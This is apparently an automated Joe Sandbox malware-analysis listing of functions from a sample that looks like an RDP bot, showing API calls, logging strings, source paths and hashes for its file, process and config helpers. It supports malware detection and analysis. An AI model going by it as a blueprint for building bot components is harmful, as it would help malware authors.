(attr != NULL), xrefs: 00007FF64B9339E0

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-3397184676
Opcode ID: e21be7be9c16bb27528b034fe24b15d1ab511b8e353f145966fad9062a5d5940
Instruction ID: a1328662b798af0db51706195d25e4eeab7327d7c63d75751b46a66acbcb2c09
Opcode Fuzzy Hash: e21be7be9c16bb27528b034fe24b15d1ab511b8e353f145966fad9062a5d5940
Instruction Fuzzy Hash: 0F5140A0A8C617D2FA20BB55E4503B92350BF1EB94F542132C96EC7EB7EE6DA945C301

Function 00007FF64B936776 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF64B9367AA

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

GetLastError.KERNEL32 ref: 00007FF64B936909

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B936818, 00007FF64B93684B, 00007FF64B93687B, 00007FF64B9368AB
(xpath != NULL), xrefs: 00007FF64B93683D
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF64B9367E5
fs_path_expand, xrefs: 00007FF64B9367DE, 00007FF64B936811, 00007FF64B936844, 00007FF64B936874, 00007FF64B9368A4, 00007FF64B9368D6, 00007FF64B936917, 00007FF64B9369E4
((*xpath_sz) > 0), xrefs: 00007FF64B93689D
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF64B9369EB
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF64B9368DD
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B936803, 00007FF64B936836, 00007FF64B936866, 00007FF64B936896
(path != NULL), xrefs: 00007FF64B93680A
(xpath_sz != NULL), xrefs: 00007FF64B93686D
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF64B93691E

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 9249b8ac11bf0b6892439467737feea6e33b7a6a6b97775ca93be675124264c7
Instruction ID: 7b62c06685310c7c1948f6b5765f244ad2a3dd3dc97ae0db493edb14e61b7182
Opcode Fuzzy Hash: 9249b8ac11bf0b6892439467737feea6e33b7a6a6b97775ca93be675124264c7
Instruction Fuzzy Hash: BE617E62E0C54791FB20BB58E8003B82291AF8F748F566036D55DC7AB7DE3DE94A8305

Function 00007FF64B9365E3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B93660E
strlen.MSVCRT ref: 00007FF64B936637
strlen.MSVCRT ref: 00007FF64B936643
strlen.MSVCRT ref: 00007FF64B936659

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9366A1, 00007FF64B9366D1, 00007FF64B936701
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF64B93673B
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF64B93666E
NULL, xrefs: 00007FF64B93676D
(path_sz != NULL), xrefs: 00007FF64B9366C3
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B93668C, 00007FF64B9366BC, 00007FF64B9366EC
((*path_sz) > 0), xrefs: 00007FF64B9366F3
(path != NULL), xrefs: 00007FF64B936693
fs_path_temp, xrefs: 00007FF64B936667, 00007FF64B93669A, 00007FF64B9366CA, 00007FF64B9366FA, 00007FF64B936734

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: a091d92821b1e82cfa39aaab01c8d8141344e235231bbb2c2f7fd8d648b90f23
Instruction ID: 47ccc5b77d8d787d749b8bb60b868271392a108663fe56cae117f451d7eb5165
Opcode Fuzzy Hash: a091d92821b1e82cfa39aaab01c8d8141344e235231bbb2c2f7fd8d648b90f23
Instruction Fuzzy Hash: 9E415161A0DA4391FA21BF55E4503B42751BF4E748F985132D56EC7ABBEF3CE5068340

Function 00007FF64B93A3E1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF64B93A4A6
GetProcessHeap.KERNEL32 ref: 00007FF64B93A4B4
HeapAlloc.KERNEL32 ref: 00007FF64B93A4C5
strlen.MSVCRT ref: 00007FF64B93A4E3
GetProcessHeap.KERNEL32 ref: 00007FF64B93A511
HeapFree.KERNEL32 ref: 00007FF64B93A522

Strings

ini_get_bytes, xrefs: 00007FF64B93A454, 00007FF64B93A484
(buf_sz != NULL), xrefs: 00007FF64B93A47D
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF64B93A537
mem_alloc, xrefs: 00007FF64B93A530
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B93A45B, 00007FF64B93A48B
(buf != NULL), xrefs: 00007FF64B93A44D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B93A446, 00007FF64B93A476

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: 9aa4ad5710ba47d1f93b0edbb4dbda2cd6f3467b747c308e6e1de2fea1d8c66b
Instruction ID: 25c4b536e266817d9e55489724414d9b7f61c45bc3bb84a5ac6800a86358e705
Opcode Fuzzy Hash: 9aa4ad5710ba47d1f93b0edbb4dbda2cd6f3467b747c308e6e1de2fea1d8c66b
Instruction Fuzzy Hash: 3E314161A0CA4785FAA1BF51E9083B92760AF4EB84F585031DA5DC7BB7DF3CE8168340

Function 00007FF64B933B64 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64B933C3E

Part of subcall function 00007FF64B933909: GetFileAttributesA.KERNEL32 ref: 00007FF64B93392A

SetFileAttributesA.KERNEL32 ref: 00007FF64B933BAB

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B933BDE, 00007FF64B933C09
NULL, xrefs: 00007FF64B933D74
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B933BC9, 00007FF64B933BF4
fs_attr_set, xrefs: 00007FF64B933BD7, 00007FF64B933C02, 00007FF64B933C4E, 00007FF64B933D1D, 00007FF64B933D83
(path != NULL), xrefs: 00007FF64B933BD0
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF64B933D8A
(attr != NULL), xrefs: 00007FF64B933BFB
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF64B933C55
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FF64B933D24

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: f5911b0597268605da7c68ab9bf962752b1e02f0852cc6a06eb7331b6788ea4b
Instruction ID: 5270bb7eaea2072813f12c1eb197920ff8e710ecf71c976561a6ff7f816c8fac
Opcode Fuzzy Hash: f5911b0597268605da7c68ab9bf962752b1e02f0852cc6a06eb7331b6788ea4b
Instruction Fuzzy Hash: 5A514D61A4C64786FB60BB24E4402B973A0AF0E754F686532D92EC7EB7DF2CE945C701

Function 00007FF64B936263 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 113fileCOMMON

Download Yara Rule

APIs

UnlockFileEx.KERNEL32 ref: 00007FF64B9362AB
CloseHandle.KERNEL32 ref: 00007FF64B9362BC

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

GetLastError.KERNEL32 ref: 00007FF64B936372

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B936301, 00007FF64B936332
[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu), xrefs: 00007FF64B936387
[I] (%s) -> Done(lock=%p), xrefs: 00007FF64B9362CC
fs_file_unlock, xrefs: 00007FF64B9362C5, 00007FF64B9362FA, 00007FF64B93632B, 00007FF64B936356, 00007FF64B936380
(lock != NULL), xrefs: 00007FF64B9362F3
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9362EC, 00007FF64B93631D
[E] (%s) -> Failed(lock=%p,err=%08x), xrefs: 00007FF64B93635D
((*lock) != INVALID_HANDLE_VALUE), xrefs: 00007FF64B936324

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: CloseErrorFileHandleLastUnlockfflushfwrite
String ID: ((*lock) != INVALID_HANDLE_VALUE)$(lock != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(lock=%p,err=%08x)$[E] (%s) -> UnlockFileEx failed(hnd=%p,gle=%lu)$[I] (%s) -> Done(lock=%p)$fs_file_unlock
API String ID: 497672076-1436771859
Opcode ID: be40d166d65ee0fd826c179aebf8d274529e1f5329d112457eecbd3a16b0776b
Instruction ID: b26f4cb17bfe9b78b3c70ae13d80762158f8afa3c89e874c1f90fb6314c87b5c
Opcode Fuzzy Hash: be40d166d65ee0fd826c179aebf8d274529e1f5329d112457eecbd3a16b0776b
Instruction Fuzzy Hash: F1418F61F0C54382FA70BB18E444BB95650AF5FBA8F102232C52EC7AF7DE2CA586C301

Function 00007FF64B938008 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF64B938019
GetProcessHeap.KERNEL32 ref: 00007FF64B93804F
HeapAlloc.KERNEL32 ref: 00007FF64B938063
wcslen.MSVCRT ref: 00007FF64B938080
GetProcessHeap.KERNEL32 ref: 00007FF64B938093
HeapAlloc.KERNEL32 ref: 00007FF64B9380A7
memcpy.MSVCRT ref: 00007FF64B9380CF

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

Part of subcall function 00007FF64B9314E2: EnterCriticalSection.KERNEL32 ref: 00007FF64B9315B3
Part of subcall function 00007FF64B9314E2: LeaveCriticalSection.KERNEL32 ref: 00007FF64B9315DB
Part of subcall function 00007FF64B9314E2: CopyFileA.KERNEL32 ref: 00007FF64B931638

GetProcessHeap.KERNEL32 ref: 00007FF64B938114
HeapFree.KERNEL32 ref: 00007FF64B938125

Strings

mem_alloc, xrefs: 00007FF64B9380DF, 00007FF64B9380FA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF64B9380E6, 00007FF64B938101

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$Process$AllocCriticalFileSection$AttributesCopyEnterFreeLeavefflushfwritememcpywcslen
String ID: [E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
API String ID: 4155868088-3920367287
Opcode ID: 98cc37affdbc9853e1a9166010f45109071c9e9919c2ed23c9d2c199f0cdb42d
Instruction ID: fcbc13f4b9c6f42ff3b36760b6e22381d019274e68591eaf9518454125d23554
Opcode Fuzzy Hash: 98cc37affdbc9853e1a9166010f45109071c9e9919c2ed23c9d2c199f0cdb42d
Instruction Fuzzy Hash: E2313D21B0CA4782F660BB56E8807B96350AB4FB84F449031CA9DC7BB7DE3CE985C700

Function 00007FF64B936A5C Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF64B936A8B
GetLastError.KERNEL32 ref: 00007FF64B936A96

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B936B22, 00007FF64B936B52, 00007FF64B936B85
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF64B936AEE
(path_sz != NULL), xrefs: 00007FF64B936B77
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B936B0D, 00007FF64B936B3D, 00007FF64B936B70
(path != NULL), xrefs: 00007FF64B936B44
(hnd != NULL), xrefs: 00007FF64B936B14
[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF64B936AB5
fs_module_path, xrefs: 00007FF64B936AAE, 00007FF64B936AE7, 00007FF64B936B1B, 00007FF64B936B4B, 00007FF64B936B7E
wfpblk.lock, xrefs: 00007FF64B936A5C

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: (hnd != NULL)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetModuleFileNameA failed(hnd=0x%p,gle=%lu)$fs_module_path$wfpblk.lock
API String ID: 2776309574-2006444783
Opcode ID: 4b8e4eb41ae9378e3f657afe959d27e4c49e50872b6dd60d7d795c4887aa8013
Instruction ID: 51e469a416b953ad4c2f908da54e8992ed5356e581a81cc405b7437c37170970
Opcode Fuzzy Hash: 4b8e4eb41ae9378e3f657afe959d27e4c49e50872b6dd60d7d795c4887aa8013
Instruction Fuzzy Hash: 29313C61A0C95795FA11BF64E9107F52360BF0E749F885132EA5CD7AB7EE7CA905C300

Function 00007FF64B935923 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 161fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF64B935969
GetFileSize.KERNEL32 ref: 00007FF64B93598C
CloseHandle.KERNEL32 ref: 00007FF64B9359AE
GetLastError.KERNEL32 ref: 00007FF64B935A34
GetLastError.KERNEL32 ref: 00007FF64B935AFA

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9359F1, 00007FF64B935A21
fs_file_size, xrefs: 00007FF64B9359EA, 00007FF64B935A1A
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9359DC, 00007FF64B935A0C
(path != NULL), xrefs: 00007FF64B9359E3
(size != NULL), xrefs: 00007FF64B935A13

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleSize
String ID: (path != NULL)$(size != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_size
API String ID: 3555958901-1687387729
Opcode ID: 17a3905e18cdb1d8a85cd9336cce15a49220aaebdb1d37666bd8c7ae0042426b
Instruction ID: 1a5425118033e129990ee972d740c8483ecf76d31ab03a5ce7e3d961d69e0b52
Opcode Fuzzy Hash: 17a3905e18cdb1d8a85cd9336cce15a49220aaebdb1d37666bd8c7ae0042426b
Instruction Fuzzy Hash: 5F615E55E0C11382FBA07A14E45437812609F4F378F696632C96EDBAF3DE6DAC845353

Function 00007FF64B933222 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF64B933233
GetLastError.KERNEL32 ref: 00007FF64B93328C

Strings

, xrefs: 00007FF64B9332AE
process_wait, xrefs: 00007FF64B933272, 00007FF64B93329B
(pi != NULL), xrefs: 00007FF64B93326B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B933279
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF64B933264
[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu), xrefs: 00007FF64B9332A2
P, xrefs: 00007FF64B933313
~, xrefs: 00007FF64B93330E

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
API String ID: 1211598281-4195011794
Opcode ID: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
Instruction ID: 5c3c41eda80feead2bda6b405171a579323f580ac251539fe62fc01afe1503f2
Opcode Fuzzy Hash: 0deb97dcf852c4bc4058bdc4b606e96b5df0ddae11b4762ffe8ba045f7a623f4
Instruction Fuzzy Hash: 3531C610E8C20782FB64B754E4C47786350AF4F318FA4A132C61FC7EB39E5DAD859242

Function 00007FF64B935C44 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF64B935CA3
GetFileTime.KERNEL32 ref: 00007FF64B935CBE
GetLastError.KERNEL32 ref: 00007FF64B935CCC
CloseHandle.KERNEL32 ref: 00007FF64B935DEE

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B935D0E, 00007FF64B935D41
(ctime != NULL) || (atime != NULL) || (mtime != NULL), xrefs: 00007FF64B935D33
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B935CF9, 00007FF64B935D2C
(path != NULL), xrefs: 00007FF64B935D00
fs_file_stat, xrefs: 00007FF64B935D07, 00007FF64B935D3A

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastTime
String ID: (ctime != NULL) || (atime != NULL) || (mtime != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_file_stat
API String ID: 2291555494-3647951244
Opcode ID: 1580c463ac1a67233ffed9850a7684daecf6e87ee339f2778340ad3587e2fc21
Instruction ID: 323f7cce8a92001e98194e65a9ea64fe8b326f4a6cb1b8083e837746e65e1954
Opcode Fuzzy Hash: 1580c463ac1a67233ffed9850a7684daecf6e87ee339f2778340ad3587e2fc21
Instruction Fuzzy Hash: FA518561E0C25382FBB47B10D4083796650AF0E7A8F196632D93DCBAF6DF2DAC458351

Function 00007FF64B93A264 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF64B93A300
_strtoui64.MSVCRT ref: 00007FF64B93A316
_errno.MSVCRT ref: 00007FF64B93A320
